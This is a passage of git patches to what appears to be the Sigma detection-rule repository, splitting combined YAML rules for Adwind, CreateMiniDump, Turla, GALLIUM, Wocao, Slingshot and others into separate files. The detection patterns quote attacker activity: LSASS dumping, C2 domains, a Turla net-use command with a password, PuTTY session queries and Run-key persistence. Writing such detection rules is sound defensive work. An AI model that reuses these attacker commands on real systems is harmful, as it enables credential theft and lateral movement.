Execution +id: 03552375-cc2c-4883-bbe4-7958d5a980be status: experimental description: Detects SILENTTRINITY stager use references: - https://github.com/byt3bl33d3r/SILENTTRINITY author: Aleksey Potapov, oscd.community date: 2019/10/22 -modified: 2020/09/06 +modified: 2021/09/19 tags: - attack.command_and_control +logsource: + category: process_creation + product: windows detection: selection: Description|contains: 'st2stager' condition: selection falsepositives: - unknown -level: high ---- -id: 03552375-cc2c-4883-bbe4-7958d5a980be -logsource: - category: process_creation - product: windows ---- -id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d -logsource: - category: image_load - product: windows +level: high \ No newline at end of file From 18e7e1600525b9918a7ab55b980eae7b94190a34 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 10:12:03 +0200 Subject: [PATCH 0977/1367] split win_mal_adwind.yml --- .../file_event/file_event_mal_adwind.yml | 31 ++++++++++++++++++ .../image_load_silenttrinity_stage_use.yml | 5 +-- .../process_creation/win_mal_adwind.yml | 32 +++---------------- .../registry_event_mal_adwind.yml | 27 ++++++++++++++++ 4 files changed, 63 insertions(+), 32 deletions(-) create mode 100644 rules/windows/file_event/file_event_mal_adwind.yml create mode 100644 rules/windows/registry_event/registry_event_mal_adwind.yml diff --git a/rules/windows/file_event/file_event_mal_adwind.yml b/rules/windows/file_event/file_event_mal_adwind.yml new file mode 100644 index 00000000..bab32007 --- /dev/null +++ b/rules/windows/file_event/file_event_mal_adwind.yml @@ -0,0 +1,31 @@ +title: Adwind RAT / JRAT +id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 +related: + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived +status: experimental +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - attack.t1064 # an old one +logsource: + category: file_event + product: windows +detection: + selection: + - TargetFilename|contains|all: + - '\AppData\Roaming\Oracle\bin\java' + - '.exe' + - TargetFilename|contains|all: + - '\Retrive' + - '.vbs' + condition: selection +level: high \ No newline at end of file diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index f65194e2..670866fa 100644 --- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -21,7 +21,4 @@ detection: condition: selection falsepositives: - unknown -level: high - - - +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index 1dc05a4a..6072400e 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -1,5 +1,5 @@ -action: global title: Adwind RAT / JRAT +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -7,17 +7,12 @@ references: - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 -modified: 2021/06/27 +modified: 2021/09/19 tags: - attack.execution - attack.t1059.005 - attack.t1059.007 - attack.t1064 # an old one -detection: - condition: selection -level: high ---- -id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 logsource: category: process_creation product: windows @@ -31,25 +26,6 @@ detection: - 'cscript.exe' - 'Retrive' - '.vbs ' ---- -id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 -logsource: - category: file_event - product: windows detection: - selection: - - TargetFilename|contains|all: - - '\AppData\Roaming\Oracle\bin\java' - - '.exe' - - TargetFilename|contains|all: - - '\Retrive' - - '.vbs' ---- -id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 -logsource: - category: registry_event - product: windows -detection: - selection: - TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - Details|startswith: '%AppData%\Roaming\Oracle\bin\' + condition: selection +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_mal_adwind.yml b/rules/windows/registry_event/registry_event_mal_adwind.yml new file mode 100644 index 00000000..3bdba761 --- /dev/null +++ b/rules/windows/registry_event/registry_event_mal_adwind.yml @@ -0,0 +1,27 @@ +title: Adwind RAT / JRAT +id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 +related: + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived +status: experimental +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - attack.t1064 # an old one +logsource: + category: registry_event + product: windows +detection: + selection: + TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + Details|startswith: '%AppData%\Roaming\Oracle\bin\' + condition: selection +level: high From deb0ad5f5845f131b21e372a236d76e20692c6cc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 10:19:34 +0200 Subject: [PATCH 0978/1367] split win_hktl_createminidump.yml --- .../file_event_hktl_createminidump.yml | 25 +++++++++++++++++++ .../win_hktl_createminidump.yml | 21 ++++------------ .../process_creation/win_mal_adwind.yml | 1 - 3 files changed, 30 insertions(+), 17 deletions(-) create mode 100644 rules/windows/file_event/file_event_hktl_createminidump.yml diff --git a/rules/windows/file_event/file_event_hktl_createminidump.yml b/rules/windows/file_event/file_event_hktl_createminidump.yml new file mode 100644 index 00000000..35b0c8ce --- /dev/null +++ b/rules/windows/file_event/file_event_hktl_createminidump.yml @@ -0,0 +1,25 @@ +title: CreateMiniDump Hacktool +id: db2110f3-479d-42a6-94fb-d35bc1e46492 +related: + - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d + type: derived +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine +author: Florian Roth +references: + - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass +date: 2019/12/22 +modified: 2021/09/19 +tags: + - attack.credential_access + - attack.t1003.001 + - attack.t1003 # an old one +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|endswith: '\lsass.dmp' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_hktl_createminidump.yml b/rules/windows/process_creation/win_hktl_createminidump.yml index 17e9927c..c5645925 100644 --- a/rules/windows/process_creation/win_hktl_createminidump.yml +++ b/rules/windows/process_creation/win_hktl_createminidump.yml @@ -1,19 +1,15 @@ -action: global title: CreateMiniDump Hacktool +id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass date: 2019/12/22 +modified: 2021/09/19 tags: - attack.credential_access - attack.t1003.001 - attack.t1003 # an old one -falsepositives: - - Unknown -level: high ---- -id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d logsource: category: process_creation product: windows @@ -23,13 +19,6 @@ detection: selection2: Imphash: '4a07f944a83e8a7c2525efa35dd30e2f' condition: 1 of them ---- -id: db2110f3-479d-42a6-94fb-d35bc1e46492 -logsource: - product: windows - category: file_event -detection: - selection: - EventID: 11 - TargetFilename|endswith: '\lsass.dmp' - condition: 1 of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index 6072400e..35a24f5a 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -26,6 +26,5 @@ detection: - 'cscript.exe' - 'Retrive' - '.vbs ' -detection: condition: selection level: high \ No newline at end of file From dc8ad15d1a59ec638ad27f1cfa50f1e0e3e80e5f Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:03:16 +0200 Subject: [PATCH 0979/1367] split win_exchange_transportagent.yml --- .../win_exchange_transportagent.yml | 29 +++++++------------ .../image_load_silenttrinity_stage_use.yml | 1 + ...s_creation_win_exchange_transportagent.yml | 24 +++++++++++++++ 3 files changed, 36 insertions(+), 18 deletions(-) rename rules/windows/{process_creation => builtin}/win_exchange_transportagent.yml (73%) create mode 100644 rules/windows/process_creation/process_creation_win_exchange_transportagent.yml diff --git a/rules/windows/process_creation/win_exchange_transportagent.yml b/rules/windows/builtin/win_exchange_transportagent.yml similarity index 73% rename from rules/windows/process_creation/win_exchange_transportagent.yml rename to rules/windows/builtin/win_exchange_transportagent.yml index 4c7f7cee..82fd5dde 100644 --- a/rules/windows/process_creation/win_exchange_transportagent.yml +++ b/rules/windows/builtin/win_exchange_transportagent.yml @@ -1,5 +1,8 @@ -action: global title: MSExchange Transport Agent Installation +id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 +related: + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: derived status: experimental description: Detects the Installation of a Exchange Transport Agent references: @@ -9,26 +12,16 @@ tags: - attack.t1505.002 author: Tobias Michalski date: 2021/06/08 -detection: - condition: selection -fields: - - AssemblyPath -falsepositives: - - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. -level: medium ---- -id: 83809e84-4475-4b69-bc3e-4aad8568612f -logsource: - product: windows - category: process_creation -detection: - selection: - CommandLine|contains: 'Install-TransportAgent' ---- -id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 +modified: 2021/09/19 logsource: product: windows service: msexchange-management detection: selection: - 'Install-TransportAgent' + condition: selection +fields: + - AssemblyPath +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: medium \ No newline at end of file diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index 670866fa..fd1358b0 100644 --- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -17,6 +17,7 @@ logsource: product: windows detection: selection: + EventID: 11 # to pass the test otherwise block as same detection that 75c505b1-711d-4f68-a357-8c3fe37dbf2d Description|contains: 'st2stager' condition: selection falsepositives: diff --git a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml new file mode 100644 index 00000000..a498310c --- /dev/null +++ b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml @@ -0,0 +1,24 @@ +title: MSExchange Transport Agent Installation +id: 83809e84-4475-4b69-bc3e-4aad856861 +status: experimental +description: Detects the Installation of a Exchange Transport Agent +references: + - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20 +tags: + - attack.persistence + - attack.t1505.002 +author: Tobias Michalski +date: 2021/06/08 +modified: 2021/09/19 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: 'Install-TransportAgent' + condition: selection +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: medium +fields: + - AssemblyPath \ No newline at end of file From 06de91c92a64d7d96bf88aeb220b5c77f88013d3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:07:24 +0200 Subject: [PATCH 0980/1367] split win_apt_wocao.yml --- rules/windows/builtin/win_apt_wocao.yml | 34 +++++++++++++++++++ ...cao.yml => process_creation_apt_wocao.yml} | 26 +++++--------- 2 files changed, 42 insertions(+), 18 deletions(-) create mode 100644 rules/windows/builtin/win_apt_wocao.yml rename rules/windows/process_creation/{win_apt_wocao.yml => process_creation_apt_wocao.yml} (81%) diff --git a/rules/windows/builtin/win_apt_wocao.yml b/rules/windows/builtin/win_apt_wocao.yml new file mode 100644 index 00000000..fc801151 --- /dev/null +++ b/rules/windows/builtin/win_apt_wocao.yml @@ -0,0 +1,34 @@ +title: Operation Wocao Activity +id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d +author: Florian Roth, frack113 +status: experimental +description: Detects activity mentioned in Operation Wocao report +references: + - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ + - https://twitter.com/SBousseaden/status/1207671369963646976 +tags: + - attack.discovery + - attack.t1012 + - attack.defense_evasion + - attack.t1036.004 + - attack.t1036 # an old one + - attack.t1027 + - attack.execution + - attack.t1053.005 + - attack.t1053 # an old one + - attack.t1059.001 + - attack.t1086 # an old one +date: 2019/12/20 +modified: 2021/09/19 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4799 + TargetUserName|startswith: 'Administr' + CallerProcessName|endswith: '\checkadmin.exe' + condition: selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_wocao.yml b/rules/windows/process_creation/process_creation_apt_wocao.yml similarity index 81% rename from rules/windows/process_creation/win_apt_wocao.yml rename to rules/windows/process_creation/process_creation_apt_wocao.yml index 977893ac..46bd5098 100644 --- a/rules/windows/process_creation/win_apt_wocao.yml +++ b/rules/windows/process_creation/process_creation_apt_wocao.yml @@ -1,5 +1,8 @@ -action: global title: Operation Wocao Activity +id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab +related: + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived author: Florian Roth, frack113 status: experimental description: Detects activity mentioned in Operation Wocao report @@ -19,23 +22,7 @@ tags: - attack.t1059.001 - attack.t1086 # an old one date: 2019/12/20 -modified: 2021/07/07 -falsepositives: - - Administrators that use checkadmin.exe tool to enumerate local administrators -level: high ---- -id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d -logsource: - product: windows - service: security -detection: - selection: - EventID: 4799 - TargetUserName|startswith: 'Administr' - CallerProcessName|endswith: '\checkadmin.exe' - condition: selection ---- -id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab +modified: 2021/09/19 logsource: category: process_creation product: windows @@ -53,3 +40,6 @@ detection: - 'iie.exe iie.txt' - 'reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\' condition: selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high \ No newline at end of file From b576ad115b14a40f44563b2874fe973f10cca05e Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:11:04 +0200 Subject: [PATCH 0981/1367] split win_apt_unidentified_nov_18.yml --- .../file_event_apt_unidentified_nov_18.yml | 24 +++++++++++++++++++ .../win_apt_unidentified_nov_18.yml | 22 ++++------------- 2 files changed, 29 insertions(+), 17 deletions(-) create mode 100644 rules/windows/file_event/file_event_apt_unidentified_nov_18.yml diff --git a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml new file mode 100644 index 00000000..bf65f672 --- /dev/null +++ b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml @@ -0,0 +1,24 @@ +title: Unidentified Attacker November 2018 +id: 3a3f81ca-652c-482b-adeb-b1c804727f74 +related: + - id: 7453575c-a747-40b9-839b-125a0aae324b + type: derived +status: stable +description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with + YYTRIUM/APT29 campaign in 2016. +references: + - https://twitter.com/DrunkBinary/status/1063075530180886529 +author: '@41thexplorer, Microsoft Defender ATP' +date: 2018/11/20 +modified: 2021/09/19 +tags: + - attack.execution + - attack.t1218.011 + - attack.t1085 # an old one +logsource: + product: windows + category: file_event +detection: + TargetFilename|contains: 'ds7002.lnk' + condition: selection +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml index 1ff40f48..9b992458 100644 --- a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml +++ b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml @@ -1,5 +1,5 @@ -action: global title: Unidentified Attacker November 2018 +id: 7453575c-a747-40b9-839b-125a0aae324b status: stable description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016. @@ -7,29 +7,17 @@ references: - https://twitter.com/DrunkBinary/status/1063075530180886529 author: '@41thexplorer, Microsoft Defender ATP' date: 2018/11/20 -modified: 2020/08/26 +modified: 2021/09/19 tags: - attack.execution - attack.t1218.011 - attack.t1085 # an old one -detection: - condition: 1 of them -level: high ---- -id: 7453575c-a747-40b9-839b-125a0aae324b logsource: category: process_creation product: windows detection: - selection1: + selection: CommandLine|contains: 'cyzfc.dat,' CommandLine|endswith: 'PointFunctionCall' ---- -id: 3a3f81ca-652c-482b-adeb-b1c804727f74 -# Sysmon: File Creation (ID 11) -logsource: - product: windows - category: file_event -detection: - selection2: - TargetFilename|contains: 'ds7002.lnk' + condition: selection +level: high From c43c12e557f48dc078026eeef086dfeda10596ff Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:17:50 +0200 Subject: [PATCH 0982/1367] split win_apt_turla_commands.yml --- ...s_creation_apt_turla_commands_critical.yml | 32 +++++++++++++++++++ ...ss_creation_apt_turla_commands_medium.yml} | 20 +++--------- ...s_creation_win_exchange_transportagent.yml | 2 +- 3 files changed, 37 insertions(+), 17 deletions(-) create mode 100755 rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml rename rules/windows/process_creation/{win_apt_turla_commands.yml => process_creation_apt_turla_commands_medium.yml} (74%) mode change 100755 => 100644 diff --git a/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml b/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml new file mode 100755 index 00000000..3d9c64bd --- /dev/null +++ b/rules/windows/process_creation/process_creation_apt_turla_commands_critical.yml @@ -0,0 +1,32 @@ +title: Turla Group Lateral Movement +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f +status: experimental +description: Detects automated lateral movement by Turla group +references: + - https://securelist.com/the-epic-turla-operation/65545/ +tags: + - attack.g0010 + - attack.execution + - attack.t1059 + - attack.lateral_movement + - attack.t1077 # an old one + - attack.t1021.002 + - attack.discovery + - attack.t1083 + - attack.t1135 +author: Markus Neis +date: 2017/11/07 +modified: 2021/09/19 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine: + - 'net use \\%DomainController%\C$ "P@ssw0rd" *' + - 'dir c:\\*.doc* /s' + - 'dir %TEMP%\\*.exe' + condition: selection +level: critical +falsepositives: + - Unknown \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_turla_commands.yml b/rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml old mode 100755 new mode 100644 similarity index 74% rename from rules/windows/process_creation/win_apt_turla_commands.yml rename to rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml index 61b55cf1..41af8a48 --- a/rules/windows/process_creation/win_apt_turla_commands.yml +++ b/rules/windows/process_creation/process_creation_apt_turla_commands_medium.yml @@ -1,5 +1,5 @@ -action: global title: Turla Group Lateral Movement +id: 75925535-ca97-4e0a-a850-00b5c00779dc status: experimental description: Detects automated lateral movement by Turla group references: @@ -16,24 +16,10 @@ tags: - attack.t1135 author: Markus Neis date: 2017/11/07 -modified: 2020/08/27 +modified: 2021/09/19 logsource: category: process_creation product: windows -falsepositives: - - Unknown ---- -id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f -detection: - selection: - CommandLine: - - 'net use \\%DomainController%\C$ "P@ssw0rd" *' - - 'dir c:\\*.doc* /s' - - 'dir %TEMP%\\*.exe' - condition: selection -level: critical ---- -id: 75925535-ca97-4e0a-a850-00b5c00779dc detection: netCommand1: CommandLine: 'net view /DOMAIN' @@ -44,3 +30,5 @@ detection: timeframe: 1m condition: netCommand1 | near netCommand2 and netCommand3 level: medium +falsepositives: + - Unknown diff --git a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml index a498310c..564270ff 100644 --- a/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml +++ b/rules/windows/process_creation/process_creation_win_exchange_transportagent.yml @@ -1,5 +1,5 @@ title: MSExchange Transport Agent Installation -id: 83809e84-4475-4b69-bc3e-4aad856861 +id: 83809e84-4475-4b69-bc3e-4aad8568612f status: experimental description: Detects the Installation of a Exchange Transport Agent references: From e69ec4624a636daf9cf65f8d4d1b788daf7be89a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:24:17 +0200 Subject: [PATCH 0983/1367] split win_apt_gallium.yml --- rules/windows/builtin/win_apt_gallium.yml | 34 +++++++++++++++ .../process_creation_apt_gallium.yml | 31 ++++++++++++++ ... => process_creation_apt_gallium_sha1.yml} | 42 +++---------------- 3 files changed, 70 insertions(+), 37 deletions(-) create mode 100644 rules/windows/builtin/win_apt_gallium.yml create mode 100644 rules/windows/process_creation/process_creation_apt_gallium.yml rename rules/windows/process_creation/{win_apt_gallium.yml => process_creation_apt_gallium_sha1.yml} (66%) diff --git a/rules/windows/builtin/win_apt_gallium.yml b/rules/windows/builtin/win_apt_gallium.yml new file mode 100644 index 00000000..06c9a76d --- /dev/null +++ b/rules/windows/builtin/win_apt_gallium.yml @@ -0,0 +1,34 @@ +title: GALLIUM Artefacts +id: 3db10f25-2527-4b79-8d4b-471eb900ee29 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: experimental +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +author: Tim Burrell +date: 2020/02/07 +modified: 2021/09/19 +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +tags: + - attack.credential_access + - attack.command_and_control +logsource: + product: windows + service: dns-server +detection: + c2_selection: + EventID: 257 + QNAME: + - 'asyspy256.ddns.net' + - 'hotkillmail9sddcc.ddns.net' + - 'rosaf112.ddns.net' + - 'cvdfhjh1231.myftp.biz' + - 'sz2016rose.ddns.net' + - 'dffwescwer4325.myftp.biz' + - 'cvdfhjh1231.ddns.net' + condition: c2_selection +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_apt_gallium.yml b/rules/windows/process_creation/process_creation_apt_gallium.yml new file mode 100644 index 00000000..ba369fe5 --- /dev/null +++ b/rules/windows/process_creation/process_creation_apt_gallium.yml @@ -0,0 +1,31 @@ +title: GALLIUM Artefacts +id: 18739897-21b1-41da-8ee4-5b786915a676 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: experimental +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +author: Tim Burrell +date: 2020/02/07 +modified: 2021/09/19 +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +tags: + - attack.credential_access + - attack.command_and_control +logsource: + product: windows + category: process_creation +detection: + legitimate_process_path: + Image|contains: + - ':\Program Files(x86)\' + - ':\Program Files\' + legitimate_executable: + sha1: + - 'e570585edc69f9074cb5e8a790708336bd45ca0f' + condition: legitimate_executable and not legitimate_process_path +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/process_creation_apt_gallium_sha1.yml similarity index 66% rename from rules/windows/process_creation/win_apt_gallium.yml rename to rules/windows/process_creation/process_creation_apt_gallium_sha1.yml index 41d7f628..20aa889b 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/process_creation_apt_gallium_sha1.yml @@ -1,20 +1,16 @@ -action: global title: GALLIUM Artefacts +id: 440a56bf-7873-4439-940a-1c8a671073c2 status: experimental description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. author: Tim Burrell date: 2020/02/07 +modified: 2021/09/19 references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) tags: - attack.credential_access - attack.command_and_control -falsepositives: - - unknown -level: high ---- -id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows category: process_creation @@ -41,34 +37,6 @@ detection: - 'f201504bd96e81d0d350c3a8332593ee1c9e09de' - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection ---- -id: 3db10f25-2527-4b79-8d4b-471eb900ee29 -logsource: - product: windows - service: dns-server -detection: - c2_selection: - EventID: 257 - QNAME: - - 'asyspy256.ddns.net' - - 'hotkillmail9sddcc.ddns.net' - - 'rosaf112.ddns.net' - - 'cvdfhjh1231.myftp.biz' - - 'sz2016rose.ddns.net' - - 'dffwescwer4325.myftp.biz' - - 'cvdfhjh1231.ddns.net' - condition: c2_selection ---- -id: 18739897-21b1-41da-8ee4-5b786915a676 -logsource: - product: windows - category: process_creation -detection: - legitimate_process_path: - Image|contains: - - ':\Program Files(x86)\' - - ':\Program Files\' - legitimate_executable: - sha1: - - 'e570585edc69f9074cb5e8a790708336bd45ca0f' - condition: legitimate_executable and not legitimate_process_path +falsepositives: + - unknown +level: high \ No newline at end of file From faff9e6db731b22a9c37d27ef0fd02433d21aa54 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:36:40 +0200 Subject: [PATCH 0984/1367] spli win_apt_slingshot.yml --- rules/windows/builtin/win_apt_slingshot.yml | 26 +++++++++++++++++ .../file_event_apt_unidentified_nov_18.yml | 1 + ....yml => proces_creation_apt_slingshot.yml} | 29 +++++-------------- 3 files changed, 35 insertions(+), 21 deletions(-) create mode 100644 rules/windows/builtin/win_apt_slingshot.yml rename rules/windows/process_creation/{win_apt_slingshot.yml => proces_creation_apt_slingshot.yml} (63%) diff --git a/rules/windows/builtin/win_apt_slingshot.yml b/rules/windows/builtin/win_apt_slingshot.yml new file mode 100644 index 00000000..520aa2e2 --- /dev/null +++ b/rules/windows/builtin/win_apt_slingshot.yml @@ -0,0 +1,26 @@ +title: Defrag Deactivation +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 +related: + - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 + type: derived +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +author: Florian Roth, Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2021/09/19 +references: + - https://securelist.com/apt-slingshot/84312/ +tags: + - attack.persistence + - attack.s0111 +logsource: + product: windows + service: security + definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' +detection: + selection: + EventID: 4701 + TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml index bf65f672..cf9ea41c 100644 --- a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml +++ b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml @@ -19,6 +19,7 @@ logsource: product: windows category: file_event detection: + selection: TargetFilename|contains: 'ds7002.lnk' condition: selection level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_slingshot.yml b/rules/windows/process_creation/proces_creation_apt_slingshot.yml similarity index 63% rename from rules/windows/process_creation/win_apt_slingshot.yml rename to rules/windows/process_creation/proces_creation_apt_slingshot.yml index 14205108..b726d27b 100755 --- a/rules/windows/process_creation/win_apt_slingshot.yml +++ b/rules/windows/process_creation/proces_creation_apt_slingshot.yml @@ -1,26 +1,19 @@ -action: global title: Defrag Deactivation +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group author: Florian Roth, Bartlomiej Czyz (@bczyz1) date: 2019/03/04 -modified: 2020/11/05 -description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +modified: 2021/09/19 references: - https://securelist.com/apt-slingshot/84312/ tags: - attack.persistence - attack.s0111 -detection: - condition: all of them -falsepositives: - - Unknown -level: medium ---- -id: 958d81aa-8566-4cea-a565-59ccd4df27b0 logsource: category: process_creation product: windows detection: - selection1: + selection: Image|endswith: '\schtasks.exe' CommandLine|contains: - '/delete' @@ -28,13 +21,7 @@ detection: CommandLine|contains|all: - '/TN' - '\Microsoft\Windows\Defrag\ScheduledDefrag' ---- -id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 -logsource: - product: windows - service: security - definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' -detection: - selection3: - 